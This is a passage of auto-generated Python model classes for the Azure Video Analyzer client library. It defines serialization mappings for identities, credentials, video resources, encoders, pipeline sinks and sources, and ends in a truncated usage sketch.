    :ivar principal_id: The principal ID.
    :vartype principal_id: str
    """

    _validation = {
        'client_id': {'readonly': True},
        'principal_id': {'readonly': True},
    }

    _attribute_map = {
        'client_id': {'key': 'clientId', 'type': 'str'},
        'principal_id': {'key': 'principalId', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(UserAssignedManagedIdentity, self).__init__(**kwargs)
        self.client_id = None
        self.principal_id = None


class UsernamePasswordCredentials(CredentialsBase):
    """Username and password credentials.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param username: Required. Username to be presented as part of the credentials.
    :type username: str
    :param password: Required. Password to be presented as part of the credentials. It is
     recommended that this value be parameterized as a secret string to prevent it from being
     returned as part of the resource on API requests.
:type password: str """ _validation = { 'type': {'required': True}, 'username': {'required': True}, 'password': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'username': {'key': 'username', 'type': 'str'}, 'password': {'key': 'password', 'type': 'str'}, } def __init__( self, **kwargs ): super(UsernamePasswordCredentials, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str self.username = kwargs['username'] self.password = kwargs['password'] class VideoAnalyzer(TrackedResource): """The Video Analyzer account. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param tags: A set of tags. Resource tags. :type tags: dict[str, str] :param location: Required. The geo-location where the resource lives. :type location: str :param identity: The identities associated to the Video Analyzer resource. :type identity: ~video_analyzer.models.VideoAnalyzerIdentity :param storage_accounts: The storage accounts for this resource. :type storage_accounts: list[~video_analyzer.models.StorageAccount] :ivar endpoints: The endpoints associated with this resource. :vartype endpoints: list[~video_analyzer.models.Endpoint] :param encryption: The account encryption properties. :type encryption: ~video_analyzer.models.AccountEncryption :param iot_hubs: The IoT Hubs for this resource. :type iot_hubs: list[~video_analyzer.models.IotHub] :param public_network_access: Whether or not public network access is allowed for resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled". :type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess :param network_access_control: Network access control for Video Analyzer. :type network_access_control: ~video_analyzer.models.NetworkAccessControl :ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values include: "Failed", "InProgress", "Succeeded". :vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState :ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer account. 
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'location': {'required': True}, 'endpoints': {'readonly': True}, 'provisioning_state': {'readonly': True}, 'private_endpoint_connections': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'location': {'key': 'location', 'type': 'str'}, 'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'}, 'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'}, 'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'}, 'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'}, 'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'}, 'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'}, 'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'}, } def __init__( self, **kwargs ): super(VideoAnalyzer, self).__init__(**kwargs) self.identity = kwargs.get('identity', None) self.storage_accounts = kwargs.get('storage_accounts', None) self.endpoints = None self.encryption = kwargs.get('encryption', None) self.iot_hubs = kwargs.get('iot_hubs', None) self.public_network_access = kwargs.get('public_network_access', None) self.network_access_control = kwargs.get('network_access_control', None) self.provisioning_state = None self.private_endpoint_connections = None class VideoAnalyzerCollection(msrest.serialization.Model): """A collection of VideoAnalyzer items. :param value: A collection of VideoAnalyzer items. :type value: list[~video_analyzer.models.VideoAnalyzer] """ _attribute_map = { 'value': {'key': 'value', 'type': '[VideoAnalyzer]'}, } def __init__( self, **kwargs ): super(VideoAnalyzerCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) class VideoAnalyzerIdentity(msrest.serialization.Model): """The managed identity for the Video Analyzer resource. All required parameters must be populated in order to send to Azure. :param type: Required. The identity type. :type type: str :param user_assigned_identities: The User Assigned Managed Identities. :type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity] """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'}, } def __init__( self, **kwargs ): super(VideoAnalyzerIdentity, self).__init__(**kwargs) self.type = kwargs['type'] self.user_assigned_identities = kwargs.get('user_assigned_identities', None) class VideoAnalyzerOperationStatus(msrest.serialization.Model): """Status of video analyzer operation. All required parameters must be populated in order to send to Azure. :param name: Required. Operation identifier. :type name: str :param id: Operation resource ID. :type id: str :param start_time: Operation start time. :type start_time: str :param end_time: Operation end time. 
:type end_time: str :param status: Operation status. :type status: str :param error: The error detail. :type error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'id': {'key': 'id', 'type': 'str'}, 'start_time': {'key': 'startTime', 'type': 'str'}, 'end_time': {'key': 'endTime', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(VideoAnalyzerOperationStatus, self).__init__(**kwargs) self.name = kwargs['name'] self.id = kwargs.get('id', None) self.start_time = kwargs.get('start_time', None) self.end_time = kwargs.get('end_time', None) self.status = kwargs.get('status', None) self.error = kwargs.get('error', None) class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model): """Status of private endpoint connection operation. All required parameters must be populated in order to send to Azure. :param name: Required. Operation identifier. :type name: str :param id: Operation resource ID. :type id: str :param start_time: Operation start time. :type start_time: str :param end_time: Operation end time. :type end_time: str :param status: Operation status. :type status: str :param error: The error detail. :type error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'id': {'key': 'id', 'type': 'str'}, 'start_time': {'key': 'startTime', 'type': 'str'}, 'end_time': {'key': 'endTime', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs) self.name = kwargs['name'] self.id = kwargs.get('id', None) self.start_time = kwargs.get('start_time', None) self.end_time = kwargs.get('end_time', None) self.status = kwargs.get('status', None) self.error = kwargs.get('error', None) class VideoAnalyzerUpdate(msrest.serialization.Model): """The update operation for a Video Analyzer account. Variables are only populated by the server, and will be ignored when sending a request. :param tags: A set of tags. Resource tags. :type tags: dict[str, str] :param identity: The identities associated to the Video Analyzer resource. :type identity: ~video_analyzer.models.VideoAnalyzerIdentity :param storage_accounts: The storage accounts for this resource. :type storage_accounts: list[~video_analyzer.models.StorageAccount] :ivar endpoints: The endpoints associated with this resource. :vartype endpoints: list[~video_analyzer.models.Endpoint] :param encryption: The account encryption properties. :type encryption: ~video_analyzer.models.AccountEncryption :param iot_hubs: The IoT Hubs for this resource. :type iot_hubs: list[~video_analyzer.models.IotHub] :param public_network_access: Whether or not public network access is allowed for resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled". :type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess :param network_access_control: Network access control for Video Analyzer. :type network_access_control: ~video_analyzer.models.NetworkAccessControl :ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values include: "Failed", "InProgress", "Succeeded". 
    :vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
    :ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
     account.
    :vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
    """

    _validation = {
        'endpoints': {'readonly': True},
        'provisioning_state': {'readonly': True},
        'private_endpoint_connections': {'readonly': True},
    }

    _attribute_map = {
        'tags': {'key': 'tags', 'type': '{str}'},
        'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
        'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
        'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
        'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
        'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
        'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
        'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoAnalyzerUpdate, self).__init__(**kwargs)
        self.tags = kwargs.get('tags', None)
        self.identity = kwargs.get('identity', None)
        self.storage_accounts = kwargs.get('storage_accounts', None)
        self.endpoints = None
        self.encryption = kwargs.get('encryption', None)
        self.iot_hubs = kwargs.get('iot_hubs', None)
        self.public_network_access = kwargs.get('public_network_access', None)
        self.network_access_control = kwargs.get('network_access_control', None)
        self.provisioning_state = None
        self.private_endpoint_connections = None


class VideoArchival(msrest.serialization.Model):
    """Video archival properties.

    :param retention_period: Video retention period indicates the maximum age of the video archive
     segments which are intended to be kept in storage. It must be provided in the ISO8601 duration
     format in the granularity of days, up to a maximum of 10 years. For example, if this is set to
     P30D (30 days), content older than 30 days will be periodically deleted. This value can be
     updated at any time and the new desired retention period will be effective within 24 hours.
    :type retention_period: str
    """

    _attribute_map = {
        'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoArchival, self).__init__(**kwargs)
        self.retention_period = kwargs.get('retention_period', None)


class VideoContentToken(msrest.serialization.Model):
    """Video content token grants access to the video content URLs.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar expiration_date: The content token expiration date in ISO8601 format (e.g.
     2021-01-01T00:00:00Z).
    :vartype expiration_date: ~datetime.datetime
    :ivar token: The content token value to be added to the video content URL as the value for the
     "token" query string parameter. The token is specific to a single video.
    :vartype token: str
    """

    _validation = {
        'expiration_date': {'readonly': True},
        'token': {'readonly': True},
    }

    _attribute_map = {
        'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
        'token': {'key': 'token', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoContentToken, self).__init__(**kwargs)
        self.expiration_date = None
        self.token = None


class VideoContentUrls(msrest.serialization.Model):
    """Set of URLs to the video content.

    :param download_url: Video file download URL. This URL can be used in conjunction with the
     video content authorization token to download the video MP4 file. The resulting MP4 file can
     be played on any standard media player. It is available when the video type is 'file' and the
     video file is available for consumption.
    :type download_url: str
    :param archive_base_url: Video archive streaming base URL. The archived content can be
     automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be
     used in conjunction with the video content authorization token on any compatible DASH or HLS
     players by appending the following to the base URL:

     .. code-block::

        - HLSv4:     /manifest(format=m3u8-aapl).m3u8
        - HLS CMAF:  /manifest(format=m3u8-cmaf)
        - DASH CMAF: /manifest(format=mpd-time-cmaf)

     Moreover, an ongoing video recording can be played in "live mode" with latencies which are
     approximately double the chosen video segment length. It is available when the video type is
     'archive' and video archiving is enabled.
    :type archive_base_url: str
    :param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically
     played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in
     conjunction with the video content authorization token to expose a WebSocket tunneled RTSP
     stream. It is available when the video type is 'archive' and a live, low-latency feed is
     available from the source.
    :type rtsp_tunnel_url: str
    :param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction
     with the video content authorization token to download the most recent still image from the
     video archive in different resolutions. They are available when the video type is 'archive'
     and preview images are enabled.
    :type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls
    """

    _attribute_map = {
        'download_url': {'key': 'downloadUrl', 'type': 'str'},
        'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'},
        'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'},
        'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoContentUrls, self).__init__(**kwargs)
        self.download_url = kwargs.get('download_url', None)
        self.archive_base_url = kwargs.get('archive_base_url', None)
        self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None)
        self.preview_image_urls = kwargs.get('preview_image_urls', None)


class VideoCreationProperties(msrest.serialization.Model):
    """Optional properties to be used in case a new video resource needs to be created on the
    service. These will not take effect if the video already exists.

    :param title: Optional title provided by the user. Value can be up to 256 characters long.
    :type title: str
    :param description: Optional description provided by the user. Value can be up to 2048
     characters long.
    :type description: str
    :param segment_length: Segment length indicates the length of individual content files
     (segments) which are persisted to storage.
     Smaller segments provide lower archive playback latency but generate a larger volume of
     storage transactions. Larger segments reduce the amount of storage transactions while
     increasing the archive playback latency. Value must be specified in ISO8601 duration format
     (e.g. "PT30S" equals 30 seconds) and can range from 30 seconds to 5 minutes, in 30-second
     increments. Changing this value after the initial call to create the video resource can lead
     to errors when uploading content to the archive. Default value is 30 seconds. This property
     is only allowed for topologies where "kind" is set to "live".
    :type segment_length: str
    :param retention_period: Video retention period indicates how long the video is kept in
     storage. Value must be specified in ISO8601 duration format (e.g. "P1D" equals 1 day) and can
     range from 1 day to 10 years, in 1-day increments. When absent (null), all video content is
     retained indefinitely. This property is only allowed for topologies where "kind" is set to
     "live".
    :type retention_period: str
    """

    _attribute_map = {
        'title': {'key': 'title', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'segment_length': {'key': 'segmentLength', 'type': 'str'},
        'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoCreationProperties, self).__init__(**kwargs)
        self.title = kwargs.get('title', None)
        self.description = kwargs.get('description', None)
        self.segment_length = kwargs.get('segment_length', None)
        self.retention_period = kwargs.get('retention_period', None)


class VideoEncoderBase(msrest.serialization.Model):
    """Base type for all video encoding presets, which define the recipe or instructions on how
    the input video should be processed.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: VideoEncoderH264.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video
     should be encoded. If omitted, the encoder sets it automatically to try and match the quality
     of the input video.
    :type bitrate_kbps: str
    :param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
     be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
     frame rate of the input video.
    :type frame_rate: str
    :param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
     resolution of the input video.
    :type scale: ~video_analyzer.models.VideoScale
    """

    _validation = {
        'type': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
        'frame_rate': {'key': 'frameRate', 'type': 'str'},
        'scale': {'key': 'scale', 'type': 'VideoScale'},
    }

    _subtype_map = {
        'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'}
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoEncoderBase, self).__init__(**kwargs)
        self.type = None  # type: Optional[str]
        self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
        self.frame_rate = kwargs.get('frame_rate', None)
        self.scale = kwargs.get('scale', None)


class VideoEncoderH264(VideoEncoderBase):
    """A custom preset for encoding video with the H.264 (AVC) codec.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str :param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should be encoded. If omitted, encoder sets it automatically to try and match the quality of the input video. :type bitrate_kbps: str :param frame_rate: The frame rate (in frames per second) of the encoded video. The value must be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average frame rate of the input video. :type frame_rate: str :param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the resolution of the input video. :type scale: ~video_analyzer.models.VideoScale """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'}, 'frame_rate': {'key': 'frameRate', 'type': 'str'}, 'scale': {'key': 'scale', 'type': 'VideoScale'}, } def __init__( self, **kwargs ): super(VideoEncoderH264, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str class VideoEntity(ProxyResource): """Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param title: Optional video title provided by the user. Value can be up to 256 characters long. :type title: str :param description: Optional video description provided by the user. Value can be up to 2048 characters long. :type description: str :ivar type_properties_type: Video content type. Different content types are suitable for different applications and scenarios. Possible values include: "Archive", "File". :vartype type_properties_type: str or ~video_analyzer.models.VideoType :ivar flags: Video flags contain information about the available video actions and its dynamic properties based on the current video state. :vartype flags: ~video_analyzer.models.VideoFlags :ivar content_urls: Set of URLs to the video content. :vartype content_urls: ~video_analyzer.models.VideoContentUrls :param media_info: Contains information about the video and audio content. :type media_info: ~video_analyzer.models.VideoMediaInfo :param archival: Video archival properties. 
    :type archival: ~video_analyzer.models.VideoArchival
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'system_data': {'readonly': True},
        'type_properties_type': {'readonly': True},
        'flags': {'readonly': True},
        'content_urls': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'system_data': {'key': 'systemData', 'type': 'SystemData'},
        'title': {'key': 'properties.title', 'type': 'str'},
        'description': {'key': 'properties.description', 'type': 'str'},
        'type_properties_type': {'key': 'properties.type', 'type': 'str'},
        'flags': {'key': 'properties.flags', 'type': 'VideoFlags'},
        'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'},
        'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'},
        'archival': {'key': 'properties.archival', 'type': 'VideoArchival'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoEntity, self).__init__(**kwargs)
        self.title = kwargs.get('title', None)
        self.description = kwargs.get('description', None)
        self.type_properties_type = None
        self.flags = None
        self.content_urls = None
        self.media_info = kwargs.get('media_info', None)
        self.archival = kwargs.get('archival', None)


class VideoEntityCollection(msrest.serialization.Model):
    """A collection of VideoEntity items.

    :param value: A collection of VideoEntity items.
    :type value: list[~video_analyzer.models.VideoEntity]
    :param next_link: A link to the next page of the collection (when the collection contains too
     many results to return in one response).
    :type next_link: str
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[VideoEntity]'},
        'next_link': {'key': '@nextLink', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoEntityCollection, self).__init__(**kwargs)
        self.value = kwargs.get('value', None)
        self.next_link = kwargs.get('next_link', None)


class VideoFlags(msrest.serialization.Model):
    """Video flags contain information about the available video actions and its dynamic
    properties based on the current video state.

    All required parameters must be populated in order to send to Azure.

    :param can_stream: Required. Value indicating whether or not the video can be streamed. Only
     "archive" type videos can be streamed.
    :type can_stream: bool
    :param has_data: Required. Value indicating whether or not there has ever been data recorded
     or uploaded into the video. Newly created videos have this value set to false.
    :type has_data: bool
    :param is_in_use: Required. Value indicating whether or not the video is currently being
     referenced by an active pipeline. The fact that it is being referenced doesn't necessarily
     indicate that data is being received. For example, video recording may be gated on events, or
     the camera may not be accessible at the time.
    :type is_in_use: bool
    """

    _validation = {
        'can_stream': {'required': True},
        'has_data': {'required': True},
        'is_in_use': {'required': True},
    }

    _attribute_map = {
        'can_stream': {'key': 'canStream', 'type': 'bool'},
        'has_data': {'key': 'hasData', 'type': 'bool'},
        'is_in_use': {'key': 'isInUse', 'type': 'bool'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoFlags, self).__init__(**kwargs)
        self.can_stream = kwargs['can_stream']
        self.has_data = kwargs['has_data']
        self.is_in_use = kwargs['is_in_use']


class VideoMediaInfo(msrest.serialization.Model):
    """Contains information about the video and audio content.

    :param segment_length: Video segment length indicates the length of individual video files
     (segments) which are persisted to storage. Smaller segments provide lower archive playback
     latency but generate a larger volume of storage transactions. Larger segments reduce the
     amount of storage transactions while increasing the archive playback latency. Value must be
     specified in ISO8601 duration format (e.g. "PT30S" equals 30 seconds) and can range from 30
     seconds to 5 minutes, in 30-second increments.
    :type segment_length: str
    """

    _attribute_map = {
        'segment_length': {'key': 'segmentLength', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoMediaInfo, self).__init__(**kwargs)
        self.segment_length = kwargs.get('segment_length', None)


class VideoPreviewImageUrls(msrest.serialization.Model):
    """Video preview image URLs. These URLs can be used in conjunction with the video content
    authorization token to download the most recent still image from the video archive in
    different resolutions. They are available when the video type is 'archive' and preview images
    are enabled.

    :param small: Low resolution preview image URL.
    :type small: str
    :param medium: Medium resolution preview image URL.
    :type medium: str
    :param large: High resolution preview image URL.
    :type large: str
    """

    _attribute_map = {
        'small': {'key': 'small', 'type': 'str'},
        'medium': {'key': 'medium', 'type': 'str'},
        'large': {'key': 'large', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoPreviewImageUrls, self).__init__(**kwargs)
        self.small = kwargs.get('small', None)
        self.medium = kwargs.get('medium', None)
        self.large = kwargs.get('large', None)


class VideoPublishingOptions(msrest.serialization.Model):
    """Optional flags used to change how video is published. These are only allowed for topologies
    where "kind" is set to "live".

    :param disable_archive: When set to 'true', content will not be archived or recorded. This is
     used, for example, when the topology is used only for low latency video streaming. Default is
     'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'.
    :type disable_archive: str
    :param disable_rtsp_publishing: When set to 'true', the RTSP playback URL will not be
     published, disabling low latency streaming. This is used, for example, when the topology is
     used only for archiving content. Default is 'false'. If set to 'true', then "disableArchive"
     must be set to 'false'.
    :type disable_rtsp_publishing: str
    """

    _attribute_map = {
        'disable_archive': {'key': 'disableArchive', 'type': 'str'},
        'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoPublishingOptions, self).__init__(**kwargs)
        self.disable_archive = kwargs.get('disable_archive', None)
        self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None)


class VideoScale(msrest.serialization.Model):
    """The video scaling information.

    :param height: The desired output video height.
    :type height: str
    :param width: The desired output video width.
    :type width: str
    :param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the
     mode is 'Pad' or 'Stretch', then both width and height must be specified. If the mode is
     'PreserveAspectRatio', only one of width or height needs to be provided. Possible values
     include: "Pad", "PreserveAspectRatio", "Stretch".
    :type mode: str or ~video_analyzer.models.VideoScaleMode
    """

    _attribute_map = {
        'height': {'key': 'height', 'type': 'str'},
        'width': {'key': 'width', 'type': 'str'},
        'mode': {'key': 'mode', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoScale, self).__init__(**kwargs)
        self.height = kwargs.get('height', None)
        self.width = kwargs.get('width', None)
        self.mode = kwargs.get('mode', None)


class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase):
    """A sequence of absolute datetime ranges as a string. The datetime values should follow
    ISO8601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be
    only one range specified in the sequence.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z",
     "2021-10-05T03:40:00Z"]]'.
    :type ranges: str
    """

    _validation = {
        'type': {'required': True},
        'ranges': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'ranges': {'key': 'ranges', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs)
        self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers'  # type: str
        self.ranges = kwargs['ranges']


class VideoSink(SinkNodeBase):
    """Video sink in a live topology allows for video and audio to be captured, optionally
    archived, and published via a video resource. If archiving is enabled, this results in a video
    of type 'archive'. If used in a batch topology, this allows for video and audio to be stored
    as a file, and published via a video resource of type 'file'.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param name: Required. Node name. Must be unique within the topology.
    :type name: str
    :param inputs: Required. An array of upstream node references within the topology to be used
     as inputs for this node.
    :type inputs: list[~video_analyzer.models.NodeInput]
    :param video_name: Required. Name of a new or existing video resource used to capture and
     publish content. Note: if this sink is downstream of an RTSP source and disableArchive is set
     to true, then no content is archived.
    :type video_name: str
    :param video_creation_properties: Optional video properties to be used in case a new video
     resource needs to be created on the service.
    :type video_creation_properties: ~video_analyzer.models.VideoCreationProperties
    :param video_publishing_options: Options to change how the video sink publishes content via
     the video resource. This property is only allowed for topologies where "kind" is set to
     "live".
    :type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions
    """

    _validation = {
        'type': {'required': True},
        'name': {'required': True},
        'inputs': {'required': True},
        'video_name': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
        'video_name': {'key': 'videoName', 'type': 'str'},
        'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'},
        'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoSink, self).__init__(**kwargs)
        self.type = '#Microsoft.VideoAnalyzer.VideoSink'  # type: str
        self.video_name = kwargs['video_name']
        self.video_creation_properties = kwargs.get('video_creation_properties', None)
        self.video_publishing_options = kwargs.get('video_publishing_options', None)


class VideoSource(SourceNodeBase):
    """Video source allows for content from a Video Analyzer video resource to be ingested into a
    pipeline. Currently supported only with batch pipelines.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param name: Required. Node name. Must be unique within the topology.
    :type name: str
    :param video_name: Required. Name of the Video Analyzer video resource to be used as the
     source.
    :type video_name: str
    :param time_sequences: Required. Describes a sequence of datetime ranges. The video source
     only picks up recorded media within these ranges.
    :type time_sequences: ~video_analyzer.models.TimeSequenceBase
    """

    _validation = {
        'type': {'required': True},
        'name': {'required': True},
        'video_name': {'required': True},
        'time_sequences': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'video_name': {'key': 'videoName', 'type': 'str'},
        'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(VideoSource, self).__init__(**kwargs)
        self.type = '#Microsoft.VideoAnalyzer.VideoSource'  # type: str
        self.video_name = kwargs['video_name']
        self.time_sequences = kwargs['time_sequences']
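
# ---------------------------------------------------------------------------
# Usage sketch (editor's addition, not part of the generated client): every
# model above follows the msrest kwargs pattern, so topology nodes are built
# by passing their serialized properties as keyword arguments. The node and
# resource names below are hypothetical placeholders; NodeInput is the input
# reference model defined elsewhere in this module.
#
#     source = RtspSource(
#         name='rtspSource',
#         transport='Tcp',
#         endpoint=UnsecuredEndpoint(
#             credentials=UsernamePasswordCredentials(username='user', password='${password}'),
#             url='rtsp://camera.example.com:554/stream',
#         ),
#     )
#     sink = VideoSink(
#         name='videoSink',
#         inputs=[NodeInput(node_name='rtspSource')],
#         video_name='camera-001',
#         video_creation_properties=VideoCreationProperties(
#             title='Camera 001',
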